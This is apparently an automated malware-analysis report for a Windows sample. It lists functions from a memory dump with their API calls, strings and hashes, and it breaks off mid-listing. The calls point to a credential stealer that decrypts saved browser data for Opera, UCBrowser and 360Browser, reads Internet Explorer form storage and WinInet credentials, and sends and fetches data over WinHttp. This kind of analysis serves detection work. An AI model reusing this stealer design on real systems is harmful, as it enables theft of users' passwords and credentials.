Opcode ID: 758274dd60bdf89e7bc139f143564a963b2b8bbba2d05a8c01142eec33dbebbf
Instruction ID: 3ceee775c1db2101e3abe91b8041793fdedad25dba46125a77d36f99286f4ace
Opcode Fuzzy Hash: 758274dd60bdf89e7bc139f143564a963b2b8bbba2d05a8c01142eec33dbebbf
Instruction Fuzzy Hash: 1132F330E01298CFDB01DBA9D9947EEBBF4AF19304FA4086ED441A7253DB784A85CB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E139, Relevance: 30.9, APIs: 13, Strings: 4, Instructions: 1136libraryloaderencryptionCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040E13E
GetProcAddress.KERNEL32(?,?), ref: 0040E198
GetProcAddress.KERNEL32(?,?), ref: 0040E1DC
GetProcAddress.KERNEL32(?,?), ref: 0040E22A
GetProcAddress.KERNEL32(?,?), ref: 0040E277
GetProcAddress.KERNEL32(?,?), ref: 0040E2C1
GetProcAddress.KERNEL32(?,?), ref: 0040E30B
GetProcAddress.KERNEL32(?,?), ref: 0040E34E
GetProcAddress.KERNEL32(?,?), ref: 0040E390
wsprintfA.USER32 ref: 0040E409

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

Part of subcall function 0043584C: __EH_prolog.LIBCMT ref: 00435851

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040ED19
LocalFree.KERNEL32(?,?,?), ref: 0040ED84

Part of subcall function 00445A55: _free.LIBCMT ref: 00445A68

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

Strings

S, xrefs: 0040F034
UCBrowser, xrefs: 0040E500
360Browser, xrefs: 0040E517
Opera, xrefs: 0040E92D

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$H_prolog$Deallocate$CryptDataFreeLocalUnprotect_free_strcatwsprintf
String ID: 360Browser$Opera$S$UCBrowser
API String ID: 1533498561-2102145511
Opcode ID: 450430b4a3c1e1bda85c2c9132d12871756206d5ebca1386dca1722c97b9e244
Instruction ID: b48f6e05fcb707e89987015dea396383d640a2a9a36e0cc3998b43e1c57b30ee
Opcode Fuzzy Hash: 450430b4a3c1e1bda85c2c9132d12871756206d5ebca1386dca1722c97b9e244
Instruction Fuzzy Hash: ECB2BA30D00268CBDB21DB65CD94BEEBBB4AF59304F1045EAE409B7292DB745E88CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040F2E6, Relevance: 30.6, APIs: 14, Strings: 3, Instructions: 861libraryloaderencryptionCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040F2EB
GetProcAddress.KERNEL32(?,?), ref: 0040F339
GetProcAddress.KERNEL32(?,?), ref: 0040F36B
GetProcAddress.KERNEL32(?,?), ref: 0040F3AA
GetProcAddress.KERNEL32(?,?), ref: 0040F3E2
GetProcAddress.KERNEL32(?,?), ref: 0040F417
GetProcAddress.KERNEL32(?,?), ref: 0040F44C
GetProcAddress.KERNEL32(?,?), ref: 0040F47D
GetProcAddress.KERNEL32(?,?), ref: 0040F4BF
wsprintfA.USER32 ref: 0040F539

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040FBE6
LocalFree.KERNEL32(?,?,?), ref: 0040FC4B
LocalFree.KERNEL32(?), ref: 0040FD1D

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Part of subcall function 0040B938: __EH_prolog.LIBCMT ref: 0040B93D
Part of subcall function 0040B938: BCryptOpenAlgorithmProvider.BCRYPT(?,AES,00000000,00000000), ref: 0040B9A6
Part of subcall function 0040B938: BCryptSetProperty.BCRYPT(?,ChainingMode,ChainingModeGCM,00000020,00000000), ref: 0040B9C4
Part of subcall function 0040B938: BCryptGenerateSymmetricKey.BCRYPT(?,00000010,00000000,00000000,?,00000020,00000000), ref: 0040B9E5
Part of subcall function 0040B938: LocalAlloc.KERNEL32(00000040,?), ref: 0040BA36
Part of subcall function 0040B938: BCryptDecrypt.BCRYPT(00000010,?,?,?,00000000,00000000,00000000,?,?,00000000), ref: 0040BA5E

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040FCD3

Strings

UCBrowser, xrefs: 0040F668
360Browser, xrefs: 0040F67D
Opera, xrefs: 0040F88F

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$Crypt$Local$DataDeallocateFreeH_prologUnprotect$AlgorithmAllocDecryptGenerateOpenPropertyProviderSymmetricwsprintf
String ID: 360Browser$Opera$UCBrowser
API String ID: 120052701-2459207352
Opcode ID: 2a6bdfbf62cb31aa1ec213f4636bdcb38748fd89bbcad6a47095bb1b4a845ae2
Instruction ID: a9e54f43a0eb16203e17623fa23cba974b08bfcab0be327bc3a9de8742627967
Opcode Fuzzy Hash: 2a6bdfbf62cb31aa1ec213f4636bdcb38748fd89bbcad6a47095bb1b4a845ae2
Instruction Fuzzy Hash: 7572AE30D04258DBDF21DFA4CD91AEEBBB5BF19308F1040AEE409B7292DB745A89CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00429F5D, Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 169encryptionstringCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,?,00000000), ref: 00429F82
CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000,?,00000000), ref: 00429FA3
lstrlenW.KERNEL32(?,?,00000000), ref: 00429FB2
CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,00000000), ref: 00429FC5
CryptGetHashParam.ADVAPI32(00000000,00000002,?,?,00000000,?,00000000), ref: 00429FE8
wsprintfW.USER32 ref: 0042A024
lstrcatW.KERNEL32(00000000,?), ref: 0042A032
wsprintfW.USER32 ref: 0042A052
lstrcatW.KERNEL32(00000000,?), ref: 0042A060
CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 0042A069
CryptReleaseContext.ADVAPI32(?,00000000,?,00000000), ref: 0042A074
lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 0042A0BB
CryptUnprotectData.CRYPT32(?,00000000,0042A2AF,00000000,00000000,00000001,?), ref: 0042A0DE
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0042A117

Strings

%02X, xrefs: 0042A01E, 0042A04C
Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0042A08E

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Crypt$Hash$ContextDatalstrcatlstrlenwsprintf$AcquireCreateDestroyFreeLocalParamReleaseUnprotect
String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 1004607082-2450551051
Opcode ID: 6439d65f7729c76b50c974d5be1b8a2cdfa08e6978128d092fcff3fe38d753c0
Instruction ID: 005e14ebd307acc44d900abe414c883e19f5054360f72cf190598c62f8d9df29
Opcode Fuzzy Hash: 6439d65f7729c76b50c974d5be1b8a2cdfa08e6978128d092fcff3fe38d753c0
Instruction Fuzzy Hash: 82514171E00219AFDB119FA4EC45FFF77BCAF44304F14402AE905E2151EAB89A15CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0040D684, Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 737libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040D689
GetProcAddress.KERNEL32(?,?), ref: 0040D6D4
GetProcAddress.KERNEL32(?,?), ref: 0040D706
GetProcAddress.KERNEL32(?,?), ref: 0040D745
GetProcAddress.KERNEL32(?,?), ref: 0040D77D
GetProcAddress.KERNEL32(?,?), ref: 0040D7B2
GetProcAddress.KERNEL32(?,?), ref: 0040D7E3
GetProcAddress.KERNEL32(?,?), ref: 0040D825
wsprintfA.USER32 ref: 0040D89F

Strings

Opera, xrefs: 0040DB96

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$H_prologwsprintf
String ID: Opera
API String ID: 3606448584-505338728
Opcode ID: 2ae9e73fc225886f61e2da0e4df3299f7b1d42ae1c4b8fbae04c6835abf33cc8
Instruction ID: 6e7de8c24cde57863cb19fb5fa9ebaa263f0b344b032abc7ce2d8d9550343516
Opcode Fuzzy Hash: 2ae9e73fc225886f61e2da0e4df3299f7b1d42ae1c4b8fbae04c6835abf33cc8
Instruction Fuzzy Hash: 0962B130D00259CBDF11EFA5CD91AEDBBB4AF19304F1084AEE409B7291DB745A89CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0043E2E4, Relevance: 19.7, APIs: 8, Strings: 3, Instructions: 469COMMON

Download Yara Rule

Strings

in-gdi-devcaps-l1-1-0, xrefs: 0043E30E
/, xrefs: 0043E37B
UT, xrefs: 0043E5BF

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: /$UT$in-gdi-devcaps-l1-1-0
API String ID: 0-3985708853
Opcode ID: ca04ac2f96e5848d747f8de154aac6de5694c76c4c834d83011a6bda12b6f8ca
Instruction ID: 76826b07e805f1e516683311a4db4d08ba6e9d74c9be735415875e9b36247458
Opcode Fuzzy Hash: ca04ac2f96e5848d747f8de154aac6de5694c76c4c834d83011a6bda12b6f8ca
Instruction Fuzzy Hash: 8E02B071A093819FD714DF2AD4807ABB7E4BF99304F14182EF98583391D738D859CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0042A130, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 97stringencryptionCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 0042A156
lstrlenW.KERNEL32(00000002), ref: 0042A167
CredEnumerateW.SECHOST(Microsoft_WinInet_*,00000000,00000000,?), ref: 0042A190
CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000001,?), ref: 0042A1D6
LocalFree.KERNEL32(?), ref: 0042A200
CredFree.ADVAPI32(?), ref: 0042A219

Strings

abe2869f-9b47-4cd9-a358-c22904dba7f7, xrefs: 0042A144
J, xrefs: 0042A170
Microsoft_WinInet_*, xrefs: 0042A18B

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CredFreelstrlen$CryptDataEnumerateLocalUnprotect
String ID: J$Microsoft_WinInet_*$abe2869f-9b47-4cd9-a358-c22904dba7f7
API String ID: 186292201-3120203912
Opcode ID: 55992ff89825beb77247bf315440d94e0371b3fb6d0cb9b06891a6d9543f6d9e
Instruction ID: 19e365c0e672387ba2505b807b813ee5e5cbdbe09d4aa82ca4ca5ffd792269d9
Opcode Fuzzy Hash: 55992ff89825beb77247bf315440d94e0371b3fb6d0cb9b06891a6d9543f6d9e
Instruction Fuzzy Hash: 7A315771E00218EBCB20DF95E844DEFBBB8FB84700F50416AE812E3241E7759A11DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF54, Relevance: 15.5, APIs: 10, Instructions: 504libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040CF59
GetProcAddress.KERNEL32(?,?), ref: 0040CFA4
GetProcAddress.KERNEL32(?,?), ref: 0040CFD6
GetProcAddress.KERNEL32(?,?), ref: 0040D015
GetProcAddress.KERNEL32(?,?), ref: 0040D04D
GetProcAddress.KERNEL32(?,?), ref: 0040D082
GetProcAddress.KERNEL32(?,?), ref: 0040D0B3
GetProcAddress.KERNEL32(?,918C8E02), ref: 0040D0F5
wsprintfA.USER32 ref: 0040D159

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$H_prologwsprintf
String ID:
API String ID: 3606448584-0
Opcode ID: 66480765f0a89010b478dd1e26a80f74240e8351c8ba3dc0e7e4dd8d8793bb5f
Instruction ID: 951dca3d5f1a07d3a896ba0750219855a8922a9ceac53cead332dd2a48e4a733
Opcode Fuzzy Hash: 66480765f0a89010b478dd1e26a80f74240e8351c8ba3dc0e7e4dd8d8793bb5f
Instruction Fuzzy Hash: 57220330D04248CFDF01DFE8D9906EEBBB5AF59308F1094AEE445B7252DB744A89CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041FD36, Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 404timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041EFFF: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041F1EE,00000002,?,00000000,00000244,?,?,0041F321,?,00000000,00000244), ref: 0041F032

_strcat.LIBCMT ref: 0041FEA9
_strcat.LIBCMT ref: 0041FF24
SystemTimeToFileTime.KERNEL32(?,000007BC), ref: 00420079
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00420099

Strings

\../, xrefs: 0041FEE9
\..\, xrefs: 0041FED3
/../, xrefs: 0041FEFA
/..\, xrefs: 0041FF0B

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileTime$_strcat$LocalPointerSystem
String ID: /../$/..\$\../$\..\
API String ID: 3418985325-3885502717
Opcode ID: 9a834d055a0211018dba5b1dadd4b08083c9029bc8dacd7e18ae1799699da538
Instruction ID: b00080852119e3309c6e69affa03d4f88f3d8ac799483f1e808ff3a2e1d6d61c
Opcode Fuzzy Hash: 9a834d055a0211018dba5b1dadd4b08083c9029bc8dacd7e18ae1799699da538
Instruction Fuzzy Hash: 01E1E2715087418BD315CF29C4806E7BBE0AF89314F548A2FE4A9C7342D779D98ACB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004373C6, Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 349registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004373CB
RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,?,?), ref: 0043746F
RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,?,?), ref: 004374BD
RegCloseKey.ADVAPI32(?,?,?), ref: 004374C6

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Strings

wEGGOW%E, xrefs: 0043773C
Y+6, xrefs: 0043747B

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseDeallocateH_prologOpenQueryValue
String ID: Y+6$wEGGOW%E
API String ID: 2130659939-258343349
Opcode ID: 2fb397d41e5cd3a1c8caaedd6e325ed5fc03c2550e78e723f59265dda7b03e7c
Instruction ID: 479214f8d44ea07ff9a1ad6becd9a1226b0edc878cb2a4cc9ae60e24f50ce448
Opcode Fuzzy Hash: 2fb397d41e5cd3a1c8caaedd6e325ed5fc03c2550e78e723f59265dda7b03e7c
Instruction Fuzzy Hash: D1D118B0D042489EDF25CFA9C8857EEBBB8AF19304F10415FE496B7282D7785648CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004371FA, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 100timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004371FF
GetTimeZoneInformation.KERNEL32(?,755524D0,00000000), ref: 0043721C

Part of subcall function 00412BD9: __EH_prolog.LIBCMT ref: 00412BDE

Part of subcall function 00413337: __EH_prolog.LIBCMT ref: 0041333C
Part of subcall function 00413337: std::locale::_Init.LIBCPMT ref: 0041335A

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0043736A

Strings

T, xrefs: 0043731F
9}<)g}, xrefs: 00437267, 004372AB, 0043726E
%A, xrefs: 004372BC

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$InformationInitIos_base_dtorTimeZonestd::ios_base::_std::locale::_
String ID: 9}<)g}$T$%A
API String ID: 3259846166-174459869
Opcode ID: f887ad9ea228c9f6f34c4635d12da41665bbe43363352a61fa3793948d6dbfe3
Instruction ID: 162ebed1eb13c3b0278badf9aa4dc64885cc43935c5698f0d3ef241c67cc4b1f
Opcode Fuzzy Hash: f887ad9ea228c9f6f34c4635d12da41665bbe43363352a61fa3793948d6dbfe3
Instruction Fuzzy Hash: 3A418F71C04358CBDB15DFA9C944BEEBBB5AF49308F1081AED809B7241EB781A89CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00410648, Relevance: 9.4, APIs: 4, Strings: 1, Instructions: 611libraryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041064D

Part of subcall function 00411E16: __EH_prolog.LIBCMT ref: 00411E1B

Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7

Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C

LoadLibraryA.KERNEL32(00000000,?), ref: 00410699
SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 004106F5

Part of subcall function 0040BB39: __EH_prolog.LIBCMT ref: 0040BB3E
Part of subcall function 0040BB39: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 0040BC51
Part of subcall function 0040BB39: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 0040BC58

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

FreeLibrary.KERNEL32(00000000), ref: 00410E60

Strings

Opera, xrefs: 00410779

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog$FreeHeapLibrary$DeallocateEnvironmentFolderLoadPathProcessSpecialVariable_strcat
String ID: Opera
API String ID: 1239964785-505338728
Opcode ID: edecc0e9115195082c133874438130f62ac5f99104b5bfb48e235dd940d06894
Instruction ID: ac1ca881525ca60fb4c11f72a3a0c97497af74f9ee91cf4d6f14cdaa43dc21d9
Opcode Fuzzy Hash: edecc0e9115195082c133874438130f62ac5f99104b5bfb48e235dd940d06894
Instruction Fuzzy Hash: D8427D70D00258DFDF14DFA9C9457EEBBB1AF49308F1080AEE445B7281DB789A85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042A224, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0046DB80,00000000,00000015,0046DBA0,?), ref: 0042A244
StrStrIW.SHLWAPI(?,0047C394), ref: 0042A295
CoTaskMemFree.OLE32(?), ref: 0042A2B3
CoTaskMemFree.OLE32(?), ref: 0042A2C1

Strings

(, xrefs: 0042A279

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeTask$CreateInstance
String ID: (
API String ID: 2903366249-3887548279
Opcode ID: ce4cd7f7648d056d8e8a876ce9c7a0421bd9f5a584195d27b53de379391fd91c
Instruction ID: 49c26595c2effa2261d274fccedc07f4d445ec10e3301bf20fc288ebb5b5a36d
Opcode Fuzzy Hash: ce4cd7f7648d056d8e8a876ce9c7a0421bd9f5a584195d27b53de379391fd91c
Instruction Fuzzy Hash: 7021F974F00219EFDB04DFA5E884D9EB7B9EF48704B5480AAE805E7250DB75AD44CB2A

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF59, Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 959memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040BF5E

Part of subcall function 0040AF03: __EH_prolog.LIBCMT ref: 0040AF08

Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64

GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,00000030,00000012,0040CF41,?,?), ref: 0040CBE4
HeapFree.KERNEL32(00000000,?,?,?,?,00000030,00000012,0040CF41,?,?,?,?,?,?,?,?), ref: 0040CBEB

Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C

Strings

+, xrefs: 0040CED0

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: DeallocateH_prologHeap$FreeProcess
String ID: +
API String ID: 2705843071-2126386893
Opcode ID: 8a4db62a01c0d3765911ab0c0a3c5cbf262fc6af8c65361dcef988124e2936a9
Instruction ID: 6f650102c44ed2988148468859b7f00f5fc0931f42b68e76572e5eacd64b4793
Opcode Fuzzy Hash: 8a4db62a01c0d3765911ab0c0a3c5cbf262fc6af8c65361dcef988124e2936a9
Instruction Fuzzy Hash: 50A2D230C042ACCAEB22CB64CD907EDBBB5AF55304F1492EAD48977192DB741BC9CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0043EFDD, Relevance: 7.6, APIs: 5, Instructions: 52COMMON

Download Yara Rule

APIs

FindClose.KERNEL32(000000FF,?,00414748,?,7FFFFFFF,?,00000000,0041444D,?,?,?,004135B9,0041444D,00000000,0041444D,?), ref: 0043EFE9
FindFirstFileExW.KERNEL32(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,?,00414748,?,7FFFFFFF,?,00000000,0041444D), ref: 0043F019
GetLastError.KERNEL32(?,?,?,?,00414748,?,7FFFFFFF,?,00000000,0041444D,?,?,?,004135B9,0041444D,00000000), ref: 0043F026
FindFirstFileExW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,?,?,?,?,00414748,?,7FFFFFFF,?,00000000,0041444D), ref: 0043F040
GetLastError.KERNEL32(?,?,?,?,00414748,?,7FFFFFFF,?,00000000,0041444D,?,?,?,004135B9,0041444D,00000000), ref: 0043F04D

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$ErrorFileFirstLast$Close
String ID:
API String ID: 569926201-0
Opcode ID: f49c407236705bb1858e3742d2d01a67902bcda0663bbd1b4337ab0556099fd5
Instruction ID: 2e699ab520b179d43ad2bf4343934b09a901ed4888842c9946054f0494e0c7a6
Opcode Fuzzy Hash: f49c407236705bb1858e3742d2d01a67902bcda0663bbd1b4337ab0556099fd5
Instruction Fuzzy Hash: 3601B531900189BBCB301F66DC0CC5B3F79EFCA721F10453AF668851E1D7B19851DA69

Uniqueness

Uniqueness Score: -1.00%

Function 004344AA, Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 276fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004344AF
WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00488780,0000000F,00000001), ref: 004344ED
CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00434511
WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?,00000001,00000000,00000002,00000080,00000000), ref: 004345DF

Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000,00000002,00000080), ref: 00438C85
Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000), ref: 00438CCC

WinHttpConnect.WINHTTP(?,00000000,00000050,00000000,?,00000001,00000000,00000002,00000080,00000000), ref: 00434639
WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00800100,?), ref: 004346B1
WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00000100,?), ref: 00434718
WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00434748
WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 00434754
WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 00434769
WinHttpReadData.WINHTTP(00000000,00000000,?,?), ref: 00434794
WriteFile.KERNEL32(?,00000000,?,CECED245,00000000), ref: 004347A9
GetLastError.KERNEL32 ref: 004347C4
WinHttpCloseHandle.WINHTTP(00000000), ref: 004347CB
WinHttpCloseHandle.WINHTTP(00000000), ref: 004347D5
CloseHandle.KERNEL32(?,00000001,00000000,00000002,00000080,00000000), ref: 004347DE
WinHttpCloseHandle.WINHTTP(?), ref: 004347E5

Strings

%99[^:]://%99[^/]%99[^], xrefs: 00434537
GET, xrefs: 004346AB, 00434712

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Http$CloseHandle$OpenRequest$ByteCharConnectDataFileMultiWide$AvailableCreateErrorH_prologLastQueryReadReceiveResponseSendWrite
String ID: %99[^:]://%99[^/]%99[^]$GET
API String ID: 4006077129-3478069819
Opcode ID: 43d55c4d29b355d9ff27e24b27742f5364b5d52ef94aca0f5717601d97efa7f5
Instruction ID: 7f1348a21265612ae21412d4864c76256cf8e41bc4be0fb22147dbfb47b544d7
Opcode Fuzzy Hash: 43d55c4d29b355d9ff27e24b27742f5364b5d52ef94aca0f5717601d97efa7f5
Instruction Fuzzy Hash: 2AA17F71D00259AFDB11DFA0CD85BEEB7B8FF49304F1040AAE405A7241EB789E45CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004340AE, Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 304COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004340B3
WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,0047935B,00000000), ref: 00434101
WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?,?,?,?,0047935B,00000000), ref: 004341D0

Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000,00000002,00000080), ref: 00438C85
Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000), ref: 00438CCC

WinHttpConnect.WINHTTP(?,00000000,00000050,00000000,?,?,?,?,0047935B,00000000), ref: 0043422D
WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00800100,?,?,?,?,0047935B,00000000), ref: 004342AF
WinHttpOpenRequest.WINHTTP(00000000,?,00000000,00000000,00000000,00000000,00000100,?,?,?,?,0047935B,00000000), ref: 00434320
_strlen.LIBCMT ref: 0043434D
_strlen.LIBCMT ref: 00434357
WinHttpSendRequest.WINHTTP(00000000,Content-Type: text/plain; charset=UTF-8,000000FF,?,00000000,00000000,00000000,?,?,?,0047935B,00000000), ref: 0043436D
WinHttpReceiveResponse.WINHTTP(00000000,00000000,?,?,?,0047935B,00000000), ref: 0043437E
WinHttpQueryDataAvailable.WINHTTP(00000000,00000000,?,?,?,0047935B,00000000), ref: 00434395
WinHttpReadData.WINHTTP(00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047935B,00000000), ref: 004343C0
GetLastError.KERNEL32(?,?,?,0047935B,00000000), ref: 00434478
WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047935B,00000000), ref: 00434482
WinHttpCloseHandle.WINHTTP(00000000,?,?,?,0047935B,00000000), ref: 00434489
WinHttpCloseHandle.WINHTTP(?,?,?,?,0047935B,00000000), ref: 00434493

Strings

Content-Type: text/plain; charset=UTF-8, xrefs: 00434367
%99[^:]://%99[^/]%99[^], xrefs: 00434127

Memory Dump Source

Source File: 00000000.00000002.271146148.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Http$CloseHandleOpenRequest$ByteCharConnectDataMultiWide_strlen$AvailableErrorH_prologLastQueryReadReceiveResponseSend
String ID: %99[^:]://%99[^/]%99[^]$Content-Type: text/plain; charset=UTF-8
API String ID: 1550182571-3818427525
Opcode ID: 5b665e84947272684be895781d81645dfdec50ed043aa19f7d00f50b5a2b819a
Instruction ID: f6a42a86f5f42bcb76b4ddb13d4285eca02b7aca3b6ba09dba9197e53e9a81a6
Opcode Fuzzy Hash: 5b665e84947272684be895781d81645dfdec50ed043aa19f7d00f50b5a2b819a
Instruction Fuzzy Hash: E1C17E70D012199FDB14DFA5C985BEEBBB8EF09304F1040AEE805A7251DB789A84CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00435346, Relevance: 28.6, APIs: 3, Strings: 16, Instructions: 102stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004349A2: LoadLibraryA.KERNEL32(?,?,?,00000000,?,?,?,00435361,00000001,?,?,?,0043549A), ref: 004349E3
Part of subcall function 004349A2: GetProcAddress.KERNEL32(00000000,?), ref: 00434A20
Part of subcall function 004349A2: FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,00435361,00000001,?,?,?,0043549A), ref: 00434A54

Part of subcall function 00434E00: RegOpenKeyExW.KERNEL32(80000001,0043549A,00000000,00020019,0043549A,?,?,00435370,00000001,?,?,?,0043549A), ref: 00434E25
